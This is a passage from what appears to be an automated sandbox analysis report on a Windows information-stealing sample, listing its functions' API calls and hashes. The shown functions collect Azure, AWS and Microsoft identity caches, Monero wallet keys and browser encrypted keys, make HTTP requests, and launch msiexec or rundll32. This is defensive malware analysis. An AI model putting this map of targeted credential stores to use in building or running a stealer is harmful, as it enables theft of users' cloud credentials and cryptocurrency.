                              • RegCloseKey.ADVAPI32(00000000), ref: 00A68499
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: b493c9f2ef8596c020e5845febaa688caf82cf2f83373f84838c3945470fdb29
                              • Instruction ID: e4bd16a4a74e10f984f38dabfd5392159312ddb7862482aa0e0c5bee75a862dc
                              • Opcode Fuzzy Hash: b493c9f2ef8596c020e5845febaa688caf82cf2f83373f84838c3945470fdb29
                              • Instruction Fuzzy Hash: 728118B1910118ABDB28DB50CD95FEAB7B8FF58700F008699E109A6180DF74AB85CFE5
                              Function 00A64D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00A64DCD
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A6492C
                                • Part of subcall function 00A64910: FindFirstFileA.KERNEL32(?,?), ref: 00A64943
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00A64E59
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FDC), ref: 00A64971
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FE0), ref: 00A64987
                                • Part of subcall function 00A64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A64B7D
                                • Part of subcall function 00A64910: FindClose.KERNEL32(000000FF), ref: 00A64B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A64EE5
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A649B0
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A708D2), ref: 00A649C5
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A649E2
                                • Part of subcall function 00A64910: PathMatchSpecA.SHLWAPI(?,?), ref: 00A64A1E
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,0144F1F0), ref: 00A64A4A
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,00A70FF8), ref: 00A64A5C
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,?), ref: 00A64A70
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,00A70FFC), ref: 00A64A82
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,?), ref: 00A64A96
                                • Part of subcall function 00A64910: CopyFileA.KERNEL32(?,?,00000001), ref: 00A64AAC
                                • Part of subcall function 00A64910: DeleteFileA.KERNEL32(?), ref: 00A64B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 9ac0890f21d748586928f5e5e460c4bd24e4fcafcf861a96f8e4238688db2f39
                              • Instruction ID: 2ccf2708a2d77d8957aa16eee25f124ef87508bb8a9b530f64bcd5fb610b3058
                              • Opcode Fuzzy Hash: 9ac0890f21d748586928f5e5e460c4bd24e4fcafcf861a96f8e4238688db2f39
                              • Instruction Fuzzy Hash: 834172BA95020467CB50F770DD4BFEE7378AB64740F408894B68A660C1FEB45BC9CB92
                              Function 00A69010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A6906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: a82492473e9d67e772b4f5f9f79e75ae1a92fd0ed87039fe8dc5d38e7176a97c
                              • Instruction ID: 3aa998650927f271a0ac330b5c46046f1c57090f6f9c71ceb8f43f0561563406
                              • Opcode Fuzzy Hash: a82492473e9d67e772b4f5f9f79e75ae1a92fd0ed87039fe8dc5d38e7176a97c
                              • Instruction Fuzzy Hash: 5571EEB1910208EBDB04EFE4DD99FEEB7B8BF48700F108509F615A7290DB74A905CBA1
                              Function 00A62E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A631C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A6335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A634EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 8cd8d094e4348ab58462ad460f504a2628b7bf3ddbe34faac3a6e0b0c7387f97
                              • Instruction ID: 7aee0124ea1de4d805b15a63c0f147cc51dd8868a46e786ca5a94684f22f8f1c
                              • Opcode Fuzzy Hash: 8cd8d094e4348ab58462ad460f504a2628b7bf3ddbe34faac3a6e0b0c7387f97
                              • Instruction Fuzzy Hash: 6312FE729101089ADB15EFA0DE92FEEB738AF24300F508559F50677191EF746B4ACFA2
                              Function 00A652C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A56280: InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
                                • Part of subcall function 00A56280: StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56303
                                • Part of subcall function 00A56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
                                • Part of subcall function 00A56280: HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
                                • Part of subcall function 00A56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
                                • Part of subcall function 00A56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A563D1
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65318
                              • lstrlen.KERNEL32(00000000), ref: 00A6532F
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00A65364
                              • lstrlen.KERNEL32(00000000), ref: 00A65383
                              • lstrlen.KERNEL32(00000000), ref: 00A653AE
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: a5c9f27c802594cab21f7a020b52093cb616e468b22b08d11e4b113a1969c846
                              • Instruction ID: 372f68d4126f95f1f5b8afe0731bb7bde927fb0feeb7ccc59dd60bb5430d2c2b
                              • Opcode Fuzzy Hash: a5c9f27c802594cab21f7a020b52093cb616e468b22b08d11e4b113a1969c846
                              • Instruction Fuzzy Hash: B651DD70910148ABCB14FF64CE96AED7779AF20341F504018F91AAB591EF346B46CFA2
                              Function 00A612D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4a8c0c4a674d5185f3bf9c16c97f7ec6afd049277d807757c5328c450b2816a1
                              • Instruction ID: cd604e64bb40585627c63606c764156dfcb83c17b5ecca6a4bb3a93738769954
                              • Opcode Fuzzy Hash: 4a8c0c4a674d5185f3bf9c16c97f7ec6afd049277d807757c5328c450b2816a1
                              • Instruction Fuzzy Hash: EBC1B6B59002199BCB14EF60DD89FEE7778BF64304F004599F10AA7281EF74AA85CFA1
                              Function 00A64280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A642EC
                              • lstrcat.KERNEL32(?,0144EFD0), ref: 00A6430B
                              • lstrcat.KERNEL32(?,?), ref: 00A6431F
                              • lstrcat.KERNEL32(?,0144D668), ref: 00A64333
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A68D90: GetFileAttributesA.KERNEL32(00000000,?,00A51B54,?,?,00A7564C,?,?,00A70E1F), ref: 00A68D9F
                                • Part of subcall function 00A59CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A59D39
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A693C0: GlobalAlloc.KERNEL32(00000000,00A643DD,00A643DD), ref: 00A693D3
                              • StrStrA.SHLWAPI(?,0144EEC8), ref: 00A643F3
                              • GlobalFree.KERNEL32(?), ref: 00A64512
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
                                • Part of subcall function 00A59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
                                • Part of subcall function 00A59AC0: LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00A644A3
                              • StrCmpCA.SHLWAPI(?,00A708D1), ref: 00A644C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A644D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00A644E5
                              • lstrcat.KERNEL32(00000000,00A70FB8), ref: 00A644F4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: af887930989c7744ba17298dc5fb91ab0e02b8700a2c788e7d771b741cdd1211
                              • Instruction ID: 323240a6c0319713f2222ad17525fa9a2bcfd3abd12d2c9e557a89fe0e21e000
                              • Opcode Fuzzy Hash: af887930989c7744ba17298dc5fb91ab0e02b8700a2c788e7d771b741cdd1211
                              • Instruction Fuzzy Hash: 9C7148B6910208ABDF14EBA0DD89FEE737DBB58700F044599F605A7181EA34DB49CF91
                              Function 00A51310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A512B4
                                • Part of subcall function 00A512A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A512BB
                                • Part of subcall function 00A512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A512D7
                                • Part of subcall function 00A512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A512F5
                                • Part of subcall function 00A512A0: RegCloseKey.ADVAPI32(?), ref: 00A512FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5134F
                              • lstrlen.KERNEL32(?), ref: 00A5135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00A51377
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A51465
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00A514EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 3c1a9c4e4a494fb88a78a1d340912dc4815dd9e046b1fca58648ee8cb6dd3cf0
                              • Instruction ID: 92dd13eb0105c27fe763d11c94ede9f234c820d0faa1c10f8cf691722b7e8af9
                              • Opcode Fuzzy Hash: 3c1a9c4e4a494fb88a78a1d340912dc4815dd9e046b1fca58648ee8cb6dd3cf0
                              • Instruction Fuzzy Hash: F25122B1D5011997CB15FB60DE96FED733CAB64700F404599B60AB2092EE306B89CFA6
                              Function 00A575D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
